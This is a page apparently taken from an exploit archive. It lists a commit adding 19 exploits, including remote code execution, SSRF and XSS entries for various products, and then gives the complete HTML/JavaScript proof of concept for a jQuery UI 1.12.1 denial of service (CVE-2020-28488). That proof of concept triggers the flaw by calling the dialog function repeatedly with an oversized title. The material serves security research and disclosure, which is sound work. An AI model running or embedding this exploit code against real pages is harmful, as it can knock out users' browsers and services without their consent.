27af25c8c3
19 changes to exploits/shellcodes jQuery UI 1.12.1 - Denial of Service (DoS) Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (3) Microsoft Exchange 2019 - Server-Side Request Forgery KZTech T3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm MyBB Timeline Plugin 1.0 - Persistent Cross-Site Scripting CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated) WordPress Plugin SuperForms 4.9 - Arbitrary File Upload Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal SonicWall SSL-VPN 8.0.0.0 - 'visualdoor' Remote Code Execution (Unauthenticated) Web Based Quiz System 1.0 - 'MCQ options' Persistent Cross-Site Scripting Online Ordering System 1.0 - Arbitrary File Upload Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated) CouchCMS 2.2.1 - Persistent Cross-Site Scripting Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC) MagpieRSS 0.72 - 'url' Command Injection CouchCMS 2.2.1 - Server-Side Request Forgery GetSimple CMS My SMTP Contact Plugin 1.1.2 - Persistent Cross-Site Scripting Montiorr 1.7.6m - Persistent Cross-Site Scripting
36 lines
No EOL
1.2 KiB
HTML
36 lines
No EOL
1.2 KiB
HTML
# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
|
|
# Date: 20 Jan, 2021
|
|
# Exploit Author: Rafael Cintra Lopes
|
|
# Vendor Homepage: https://jqueryui.com/
|
|
# Software Link: https://jqueryui.com/download/
|
|
# Version: <= 1.12.1
|
|
# CVE : CVE-2020-28488
|
|
|
|
<!DOCTYPE html>
|
|
<html lang="en">
|
|
<head>
|
|
<meta charset="UTF-8">
|
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
<title>DoS - jQuery UI 1.12.1</title>
|
|
</head>
|
|
<body>
|
|
<h2>DoS - jQuery UI 1.12.1</h2>
|
|
|
|
<div>
|
|
<button onclick="exploit()">Exploit</button>
|
|
</div>
|
|
|
|
<p>PoC by Rafael Cintra Lopes</p>
|
|
|
|
<script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
|
|
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
|
|
|
|
<script>
|
|
function exploit(){
|
|
for (var i = 0; i < 10; i++) {
|
|
$("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
|
|
}
|
|
}
|
|
</script>
|
|
</body>
|
|
</html> |